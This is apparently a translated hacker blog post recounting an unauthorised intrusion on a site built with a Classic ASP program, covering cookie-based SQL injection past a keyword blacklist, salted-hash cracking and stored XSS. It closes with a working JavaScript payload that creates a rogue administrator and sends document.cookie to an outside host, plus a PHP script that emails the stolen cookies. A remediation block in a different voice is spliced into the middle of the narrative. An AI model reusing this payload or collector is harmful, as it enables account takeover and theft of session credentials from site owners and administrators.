First I took a rough look at the site's overall structure
and found it was not the kind of junk corporate site you can take down in 5 minutes.
The other sites on the same server were all built with the same program.
I couldn't be bothered with the C segment, because in the data center where a site like this sits, your odds of ARP-sniffing any data are worse than the Chinese football team's odds of reaching the World Cup.
Then again, when I was doing foreign trade last year the company seemed to be using this very program; I only glanced at it at the time and didn't see any serious vulnerabilities.
Recently things were quiet at work, so I got the source code of this program from a former colleague and read through it.
I found the following security problems. In New.asp:

```asp
<!--#include file="top.asp"-->
<%
page=clng(request("page"))
Set rs=Server.CreateObject("ADODB.RecordSet")
' "type" is concatenated straight into the SQL string
sql="select * from member_news where type='"&request("type")&"' order by order0 desc"
rs.Open sql,conn,1,1
if rs.eof and rs.bof then
    response.Write("No news!")
else
%>
```

top.asp in turn includes inc/sql.asp, whose contents are:

```asp
<%
'SQL filter
Dim Fy_Post,Fy_Get,Fy_In,Fy_Inf,Fy_Xh,Fy_db,Fy_dbstr
'Custom list of strings to filter, separated by "|"
Fy_In = "'|;|[| and | exec | insert | select | delete | update | count |*|%| chr | mid | master | truncate | char | declare "
'----------------------------------
Fy_Inf = split(Fy_In,"|")
'--------POST part------------------
If Request.Form<>"" Then
    For Each Fy_Post In Request.Form
        For Fy_Xh=0 To Ubound(Fy_Inf)
            If Instr(LCase(Request.Form(Fy_Post)),Fy_Inf(Fy_Xh))<>0 Then
                response.write"<script>//alert('sorry for you put which including irregular symbol:\"&Fy_Inf(Fy_Xh)&"');history.go(-1);</script>"
                response.end
            End If
        Next
    Next
End If
'--------GET part-------------------
If Request.QueryString<>"" Then
    For Each Fy_Get In Request.QueryString
        For Fy_Xh=0 To Ubound(Fy_Inf)
            If Instr(LCase(Request.QueryString(Fy_Get)),Fy_Inf(Fy_Xh))<>0 Then
                response.write"<script>//alert('sorry for you put which including irregular symbol:\"&Fy_Inf(Fy_Xh)&"');history.go(-1);</script>"
                response.end
            End If
        Next
    Next
End If
%>
```

Buddy, why don't you take cookies seriously? The filter only walks Request.Form and Request.QueryString, while the bare request("type") in New.asp also reads Request.Cookies, which is never inspected.

The key part of the backend login, admin/login.asp:

```asp
md5key="pjfmd5"
if request("action")="login" then
    admin_name=trim(request("admin_name"))
    admin_pass=md5(trim(request("admin_pass"))&md5key)
```

So take the hash obtained through injection to cmd5 and crack it; Xxooxxoo:pjfmd5 is then the plaintext.
So one injection landed. To be safe I tested locally first, and the result was positive.
But this loser had changed the backend path; I tried the password against FTP, the mailbox and so on, with no result. SO, keep digging.
Half an hour later I found the following code in inc/modify.asp:
```asp
if request.Form("submit")<>"" then
    set rs=server.createobject("adodb.recordset")
    sql="select * from [user] where User_Name='"&session("user_name")&"'"
    rs.open sql,conn,1,3
    if rs.eof and rs.bof then
        response.write"<SCRIPT>//alert('Sorry,this User_name not exist! Please check it');history.back(-1)</SCRIPT>"
        response.end()
    else
        for i=2 to rs.fields.count-1
            if rs.fields(i).Name="Password2" then
            elseif rs.fields(i).Name="Country" then
                rs(rs.fields(i).Name)=split(countrystr,",")((request.Form(rs.fields(i).Name)))
            elseif rs.fields(i).Name="Password" and (request.Form(rs.fields(i).Name))<>rs("password") then
                response.Write "<SCRIPT>//alert('You have Changed the password!');</SCRIPT>"
                rs(rs.fields(i).Name)=md5((request.Form(rs.fields(i).Name))&md5key)
            elseif rs.fields(i).Name="sex" then
                rs(rs.fields(i).Name)=(""<>(request.Form(rs.fields(i).Name)))
            else
                ' every other form field is written to its column exactly as submitted
                rs(rs.fields(i).Name)=(request.Form(rs.fields(i).Name))
            end if 'save information
        next
        rs.update
        rs.close
    end if
    response.Write "<SCRIPT>//alert('Modify success!');location='log.asp'</SCRIPT>"
    response.End()
end if
%>
```

The fields go straight into the database without any processing. In other words, we can put our JS into the form.
OK, on to the backend's data-retrieval part, in /admin/member/6pjf.asp:

```asp
elseif request("ac")="会员管理" then
.............
call rstotable(tcol_tname,where_order,"user",20,temptitle,"6pjfadd.asp","id","yes")
```

where the function rstotable pulls the data out without any filtering.
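The two fixes these findings call for, as an added example in Classic ASP that is not part of the original program or of this write-up: the New.asp query with type bound as a parameter (read from Request.QueryString only, since the bare request("type") also accepts cookies, which inc/sql.asp never checks), and an rstotable replacement that HTML-encodes every cell before the admin's browser sees it. It assumes conn is the open ADODB.Connection that top.asp provides and that member_news.type is a text column of at most 50 characters.

```asp
<%
' Added example, not the original program's code. Assumes "conn" is the open
' ADODB.Connection supplied by top.asp and that member_news.type is text of up to 50 chars.

' Fix 1 (New.asp): bind "type" as a parameter instead of concatenating it into the SQL.
' Only Request.QueryString is read; the bare request("type") in the original also
' reads Request.Cookies, which the blacklist in inc/sql.asp never inspects.
Function OpenNewsByType(conn, newsType)
    Dim cmd
    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = conn
    cmd.CommandType = 1   ' adCmdText
    cmd.CommandText = "select * from member_news where type = ? order by order0 desc"
    cmd.Parameters.Append cmd.CreateParameter("type", 202, 1, 50, newsType) ' 202=adVarWChar, 1=adParamInput
    Set OpenNewsByType = cmd.Execute
End Function

' Fix 2 (rstotable): HTML-encode every cell, so a profile field that inc/modify.asp saved
' with <script> in it is displayed as text in the admin's browser instead of executed.
Function EncodeCell(value)
    EncodeCell = Server.HTMLEncode(value & "")   ' "& """ turns Null into "", which HTMLEncode accepts
End Function
Sub SafeRsToTable(rs)
    Dim i
    Response.Write "<table><tr>"
    For i = 0 To rs.Fields.Count - 1
        Response.Write "<th>" & EncodeCell(rs.Fields(i).Name) & "</th>"
    Next
    Response.Write "</tr>" & vbCrLf
    Do Until rs.EOF
        Response.Write "<tr>"
        For i = 0 To rs.Fields.Count - 1
            Response.Write "<td>" & EncodeCell(rs.Fields(i).Value) & "</td>"
        Next
        Response.Write "</tr>" & vbCrLf
        rs.MoveNext
    Loop
    Response.Write "</table>" & vbCrLf
End Sub

Dim rs
Set rs = OpenNewsByType(conn, Request.QueryString("type"))
If rs.EOF And rs.BOF Then
    Response.Write "No news!"
Else
    SafeRsToTable rs
End If
rs.Close
%>
```

Because 6pjfadd.asp creates the administrator on the strength of the session alone, that form should also carry a per-session token which the handler checks; that blocks a forged POST even where an encoding gap remains.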
Tested it. Heh, hilarious.
Based on these conditions I wrote a JS exploit that
adds an administrator and
records the cookies and sends them to my QQ. Then I sat back and waited for results. The JS code is:

```javascript
document.write('Alabama');
var xmlHttp;
if(window.ActiveXObject){
    xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
}
else if(window.XMLHttpRequest)
{
    xmlHttp = new XMLHttpRequest();
}

function validateForm() {
    str = window.location.pathname;
    var strs= new Array();
    strs=str.split("/");
    x = strs[1];
    var url = "/"+ x +"/member/6pjfadd.asp?ac=%ba%f3%cc%a8%d5%ca%ba%c5%c9%e8%d6%c3";
    var params = "admin_name=yezi&admin_pass=fuckyou&admin_alow=%C0%CF%B0%E5&addtime=2012-5-31+4%3A55%3A59&submit=%CC%ED%BC%D3%BC%C7%C2%BC&refer="+ document.referrer;
    xmlHttp.open("POST", url, true);
    xmlHttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    xmlHttp.setRequestHeader("Content-length", params.length);
    xmlHttp.setRequestHeader("Connection", "close");
    xmlHttp.onreadystatechange = function() {
        if(xmlHttp.readyState == 4 && xmlHttp.status == 200) {
            //alert(xmlHttp.responseText);
        }
    }
    xmlHttp.send(params);
}
validateForm();
(function(){
    var a=document.createElement('script');
    a.setAttribute('type', 'text/javascript');
    a.setAttribute('src', 'http://yezi.us/xss.php?cookie='+document.cookie);
    document.getElementsByTagName('head').item(0).appendChild(a);
})()
```

The XSS.php code is:

```php
<?php
date_default_timezone_set('Asia/Shanghai');
$a=@$_GET['cookie'];
$ref=$_SERVER['HTTP_REFERER'];
$data=$a."---cookie"."\r\n".$ref."---referer"."\r\n";
$to='5078****@qq.com';
$subject = 'You have something From : '.$ref;
$body="\n-------URL= ".$ref."\n-------Time = " .date("Y-m-d H:i:s")."\n-------Data = ".$data."\n----------------------------------------------";
$headers= 'MIME-Version: 1.0' . "\r\n";
$headers.= 'Content-type: text/html; charset=utf-8' . "\r\n";
$headers.="Here Come Some Password";
if(!empty($a)){
    $sendmail = @mail($to, $subject, $body, $headers);
    if(!$sendmail){
        @$file = fopen('xsstest.txt' , 'a+');
        @$write = fwrite($file,$a.$ref.$data."\r\n");
        @fclose($file);
    }
}else{
    echo "Hey , man ,What r u doing ? ";
}
?>
```

Excerpted from yezi.us